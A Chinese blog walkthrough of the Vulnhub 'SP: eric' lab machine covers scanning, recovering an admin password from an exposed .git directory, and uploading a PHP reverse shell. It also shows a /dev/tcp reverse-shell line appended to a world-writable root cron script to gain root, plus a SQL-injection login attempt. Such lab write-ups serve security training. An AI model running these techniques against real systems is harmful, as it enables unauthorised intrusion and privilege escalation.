首页 > 其他分享 >Vulnhub之Eric靶机详细测试过程

Vulnhub之Eric靶机详细测试过程

时间:2023-01-12 11:37:37浏览次数:50  
标签:56.149 -- kali 192.168 Eric Vulnhub 靶机 root eric

Eric

作者: jason_huawen

靶机信息

名称:SP: eric

地址:

https://www.vulnhub.com/entry/sp-eric,274/

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                               
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:e5:b4:f2      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.149  08:00:27:f0:b6:e3      1      60  PCS Systemtechnik GmbH        

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.149

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.149 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-11 21:49 EST
Nmap scan report for bogon (192.168.56.149)
Host is up (0.00026s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d3:79:15:3d:11:4c:af:26:6c:b2:af:6a:0b:99:14:fd (RSA)
|   256 87:48:76:38:81:c2:a0:50:cd:4c:39:c0:7c:7a:07:40 (ECDSA)
|_  256 8e:b9:dd:8d:14:9b:e3:63:1d:d7:0e:54:98:8d:29:5b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-git: 
|   192.168.56.149:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: minor changes 
|_http-title: Blog under construction
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:F0:B6:E3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)

值得注意的是NMAP对80端口的扫描有以下两点信息指的注意:

  1. 可能是blog网站

  2. 有个/.git目录,需要用相关的工具进行分析。

获得Shell

──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ curl -s http://192.168.56.149/
<html>
<head>
<title>Blog under construction</title>
</head>

<body>
<h1>Blog under construction</h1>

<p>As a hobby project I'm learning about web development and therefore going to build this blog as a learning process. Please come back when it's finished!</p>

</body>
</html>

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ curl -s http://192.168.56.149/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.149 Port 80</address>
</body></html>

看下/.git目录

但是访问该目录,返回信息:Forbidden,因此可能需要相应的工具或者目录扫描工具扫描其下级的目录文件,暂时搁置。

──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ nikto -h http://192.168.56.149
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.149
+ Target Hostname:    192.168.56.149
+ Target Port:        80
+ Start Time:         2023-01-11 21:54:20 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 7915 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-01-11 21:55:25 (GMT-5) (65 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

访问/admin.php文件,并提交admin' or 1=1 -- , 尝试绕过登录,结果返回:

Wrong username and/or password. Don't even bother bruteforcing.

哈哈,看能不能扫出其他目录来吧

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ gobuster dir -u http://192.168.56.149 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.149
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/01/11 21:57:09 Starting gobuster in directory enumeration mode
===============================================================
/upload               (Status: 301) [Size: 317] [--> http://192.168.56.149/upload/]
/server-status        (Status: 403) [Size: 302]
Progress: 219243 / 220561 (99.40%)
===============================================================
2023/01/11 21:57:46 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ gobuster dir -u http://192.168.56.149 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.149
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh,js
[+] Timeout:                 10s
===============================================================
2023/01/11 21:57:55 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/index.php            (Status: 200) [Size: 281]
/.html                (Status: 403) [Size: 294]
/admin.php            (Status: 200) [Size: 306]
/upload               (Status: 301) [Size: 317] [--> http://192.168.56.149/upload/]
/.html                (Status: 403) [Size: 294]
/.php                 (Status: 403) [Size: 293]
/server-status        (Status: 403) [Size: 302]
Progress: 1321836 / 1323366 (99.88%)
===============================================================
2023/01/11 22:02:53 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ dirb http://192.168.56.149

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Jan 11 22:02:59 2023
URL_BASE: http://192.168.56.149/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.149/ ----
+ http://192.168.56.149/.git/HEAD (CODE:200|SIZE:23)                                                                         
+ http://192.168.56.149/admin.php (CODE:200|SIZE:306)                                                                        
+ http://192.168.56.149/index.php (CODE:200|SIZE:281)                                                                        
+ http://192.168.56.149/server-status (CODE:403|SIZE:302)                                                                    
==> DIRECTORY: http://192.168.56.149/upload/                                                                                 
                                                                                                                             
---- Entering directory: http://192.168.56.149/upload/ ----
                                                                                                                             
-----------------
END_TIME: Wed Jan 11 22:03:04 2023
DOWNLOADED: 9224 - FOUND: 4
                                          

看来接下来需要用git工具分析目标主机上的仓库。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric/GitHack-master]
└─$ ls
data  GitHack.py  lib  LICENSE  README.md
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric/GitHack-master]
└─$ python2 GitHack.py http://192.168.56.149/.git/

  ____ _ _   _   _            _                                                                                               
 / ___(_) |_| | | | __ _  ___| | __                                                                                           
| |  _| | __| |_| |/ _` |/ __| |/ /                                                                                           
| |_| | | |_|  _  | (_| | (__|   <                                                                                            
 \____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}                                                                                    
 A '.git' folder disclosure exploit.                                                                                          
                                                                                                                              
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://192.168.56.149/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
Cloning into '/home/kali/Desktop/Vulnhub/Eric/GitHack-master/dist/192.168.56.149'...
fatal: repository 'http://192.168.56.149/.git/' not found
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://192.168.56.149/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[!] Initialize Git Error: hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all                                                
hint: of your new repositories, which will suppress this warning, call:                                                       
hint:                                                                                                                         
hint:   git config --global init.defaultBranch <name>                                                                         
hint:                                                                                                                         
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and                                                       
hint: 'development'. The just-created branch can be renamed via this command:                                                 
hint:                                                                                                                         
hint:   git branch -m <name>                                                                                                  
                                                                                                                              
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/3d/b5628b550f5c9c9f6f663cd158374035a6eaa0
[*] objects/31/33d44be3eebe6c6761b50c6fdf5b7fb664c2d8
[*] objects/a8/9a716b3c21d8f9fee38a0693afb22c75f1d31c
[*] objects/f0/d95f54335626ce6c96522e0a9105780b3366c5
[*] objects/c0/951efcb330fc310911d714acf03b873aa9ab43
[*] objects/23/448969d5b347f8e91f8017b4d8ef6edf6161d8
[*] objects/cc/1ab96950f56d1fff0d1f006821cab6b6b0e249
[*] objects/3d/8e9ce9093fc391845dd69b0436b258ac4a6387
[*] objects/e7/ba67226cda1ecc1bd3a2537f0be94343d448bb
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success

[+] Clone Success. Dist File : /home/kali/Desktop/Vulnhub/Eric/GitHack-master/dist/192.168.56.149
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric/GitHack-master]
└─$ ls -alh
total 68K
drwxr-xr-x 5 kali kali 4.0K Jan 11 22:09 .
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:08 ..
drwxr-xr-x 2 kali kali 4.0K Jan 11 22:08 data
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:09 dist
-rwxr-xr-x 1 kali kali  809 Jan 11 22:08 GitHack.py
-rw-r--r-- 1 kali kali   45 Jan 11 22:08 .gitignore
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:09 lib
-rw-r--r-- 1 kali kali  35K Jan 11 22:08 LICENSE
-rw-r--r-- 1 kali kali  805 Jan 11 22:08 README.md
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric/GitHack-master]
└─$ cd dist          
                                                                                                                              
┌──(kali㉿kali)-[~/…/Vulnhub/Eric/GitHack-master/dist]
└─$ ls -alh
total 12K
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:09 .
drwxr-xr-x 5 kali kali 4.0K Jan 11 22:09 ..
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:09 192.168.56.149
                                                                                                                              
┌──(kali㉿kali)-[~/…/Vulnhub/Eric/GitHack-master/dist]
└─$ cd 192.168.56.149 
                                                                                                                              
┌──(kali㉿kali)-[~/…/Eric/GitHack-master/dist/192.168.56.149]
└─$ ls     
admin.php  index.php
                                                                                                                              
┌──(kali㉿kali)-[~/…/Eric/GitHack-master/dist/192.168.56.149]
└─$ cat admin.php    
<?php

ob_start();
session_start();

if ($_POST['submit']) {
    if ($_POST['username'] == 'admin' && $_POST['password'] == '[email protected]$glo0mappL3') {
        $_SESSION['auth'] = 1;
    } else {
        exit("Wrong username and/or password. Don't even bother bruteforcing.");
    }
}

// Todo: Make sure it is only allowed to upload images.
if ($_POST['submit_post']) {
    if (move_uploaded_file($_FILES['image']['tmp_name'], 'upload/' . $_FILES['image']['name'])) {
    }
}
 
?>

<html>
<head>
<title>admin login</title>
</head>
<body>

<?php
if (!isset($_SESSION['auth'])) {
?>
<form action="admin.php" method="post">
<input name="username" type="text" placeholder="Username" />
<input name="password" type="password" placeholder="Password" /><br />
<input name="submit" type="submit" value="Login"/>
</form>

<?php
} else {
?>

<h1>Add new post (under construction)</h1>
<form action="admin.php" method="post" enctype="multipart/form-data">
<input name="post_title" type="text" placeholder="Title"><br />
<textarea name="post_body" cols="40" rows="3" placeholder="Body"></textarea><br />
<input name="image" type="file" placeholder="Image" /> 
<input type="submit" name="submit_post" value="Upload"/>
</form>

<h1>Add site to blogroll</h1>
<input name="blogroll_add" type="text"/><br/>
<input name="blogroll_submit" type="submit" value="add"/>

<?php
}
?>
</body>
</html>
                                                                                                                              
┌──(kali㉿kali)-[~/…/Eric/GitHack-master/dist/192.168.56.149]
└─$ 

githack工具发现了admin的密码

可以成功登陆/admin.php,该页面可以上传文件,虽然没有提示是否上传成功,但是当访问/upload/shell.php,发现已经成功得到反弹回来的shell, upload目录在目录扫描阶段的是会有已经得到。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.149] 38574
Linux eric 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 04:13:12 up 26 min,  0 users,  load average: 0.00, 0.67, 1.25
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@eric:/$ cd /home
cd /home
www-data@eric:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Oct 28  2018 .
drwxr-xr-x 22 root root 4.0K Oct 21  2018 ..
drwxr-xr-x  4 eric eric 4.0K Jan 12 04:12 eric
www-data@eric:/home$ cd eric
cd eric
www-data@eric:/home/eric$ ls -alh
ls -alh
total 64K
drwxr-xr-x 4 eric eric 4.0K Jan 12 04:12 .
drwxr-xr-x 3 root root 4.0K Oct 28  2018 ..
-rw------- 1 eric eric   81 Dec 23  2018 .bash_history
-rw-r--r-- 1 eric eric  220 Oct 28  2018 .bash_logout
-rw-r--r-- 1 eric eric 3.7K Oct 28  2018 .bashrc
drwx------ 2 eric eric 4.0K Oct 28  2018 .cache
drwxrwxr-x 3 eric eric 4.0K Oct 28  2018 .local
-rw-r--r-- 1 eric eric  807 Oct 28  2018 .profile
-rw-r--r-- 1 eric eric    0 Oct 28  2018 .sudo_as_admin_successful
-rwxrwxrwx 1 root root   55 Oct 28  2018 backup.sh
-rw-r--r-- 1 root root  24K Jan 12 04:12 backup.zip
-rw-r--r-- 1 root root   13 Oct 28  2018 flag.txt
www-data@eric:/home/eric$ cat flag.txt
cat flag.txt
89340a834323
www-data@eric:/home/eric$ cat backup.sh
cat backup.sh
#!/bin/bash
zip -r /home/eric/backup.zip /var/www/html
www-data@eric:/home/eric$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@eric:/home/eric$ 

对backup.sh文件有读写权限,可以追加反向shell,后台应该运行cron任务,从而得到root权限

提权

www-data@eric:/home/eric$ echo 'bash -i >& /dev/tcp/192.168.56.146/6666 0>&1' >> backup.sh
< >& /dev/tcp/192.168.56.146/6666 0>&1' >> backup.sh
www-data@eric:/home/eric$ cat backup.sh
cat backup.sh
#!/bin/bash
zip -r /home/eric/backup.zip /var/www/html
bash -i >& /dev/tcp/192.168.56.146/6666 0>&1
www-data@eric:/home/eric$ 

┌──(kali㉿kali)-[~/Desktop/Toolsets/GitHack-master]
└─$ sudo nc -nlvp 6666    
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.149] 41466
bash: cannot set terminal process group (794): Inappropriate ioctl for device
bash: no job control in this shell
root@eric:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@eric:~# cd /root
cd /root
root@eric:~# ls -alh
ls -alh
total 32K
drwx------  3 root root 4.0K Dec 23  2018 .
drwxr-xr-x 22 root root 4.0K Oct 21  2018 ..
-rw-------  1 root root  275 Dec 23  2018 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
-rw-r--r--  1 root root   21 Oct 28  2018 flag.txt
drwxr-xr-x  3 root root 4.0K Oct 28  2018 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Oct 28  2018 .selected_editor
root@eric:~# cat flag.txt
cat flag.txt
6a347b975dd18ae6497c
root@eric:~# 

至此成功得到root shell,拿到了root flag.

标签:56.149,--,kali,192.168,Eric,Vulnhub,靶机,root,eric
From: https://www.cnblogs.com/jason-huawen/p/17045960.html

相关文章

  • vulnhub靶场之HACKATHONCTF: 2
    准备:攻击机:虚拟机kali、本机win10。靶机:HackathonCTF:2,下载地址:https://download.vulnhub.com/hackathonctf/Hackathon2.zip,下载后直接vm打开即可。知识点:vim提权、hyd......
  • vulnhub靶场之FUNBOX: UNDER CONSTRUCTION!
    准备:攻击机:虚拟机kali、本机win10。靶机:Funbox:UnderConstruction!,下载地址:https://download.vulnhub.com/funbox/Funbox10.ova,下载后直接vbox打开即可。知识点:osComm......
  • vulnhub靶场之BUFFEMR: 1.0.1
    准备:攻击机:虚拟机kali、本机win10。靶机:BUFFEMR:1.0.1,下载地址:https://download.vulnhub.com/buffemr/BuffEMR-v1.0.1.ova,下载后直接vbox打开即可。知识点:openemr框架......
  • Vulnhub之Funbox 3靶机详细测试过程
    Funbox3作者:jason_huawen靶机信息名称:Funbox:Easy地址:https://www.vulnhub.com/entry/funbox-easy,526/识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/F......
  • Vulnhub之Funbox 4靶机详细测试过程(由于缺包,提权失败)
    Funbox4识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|......
  • Vulnhub之Funbox Gamble靶机测试过程(部分)
    Funbox6识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|Sc......
  • vulnhub靶场Jangow: 1.0.1
    闲得无聊,好久没做题了。去vulnhub发现21年好多没做过。找了个Jangow:1.0.1做做,以此记录。导入到Vbox里正常启动。信息搜集虽然启动后控制台已经有IP了,但是假装不知道,......
  • Numerical_results_DFP
            ......
  • Vulnhub之Funbox 11 (Scriptkiddie)靶机测试过程
    Funbox11(Scriptkiddie)作者:jason_huawen靶机信息名称:Funbox:Scriptkiddie地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/识别目标主机IP地址─(......
  • Vulnhub之Hacksudo Thor靶机详细测试过程
    HacksudoThor识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24......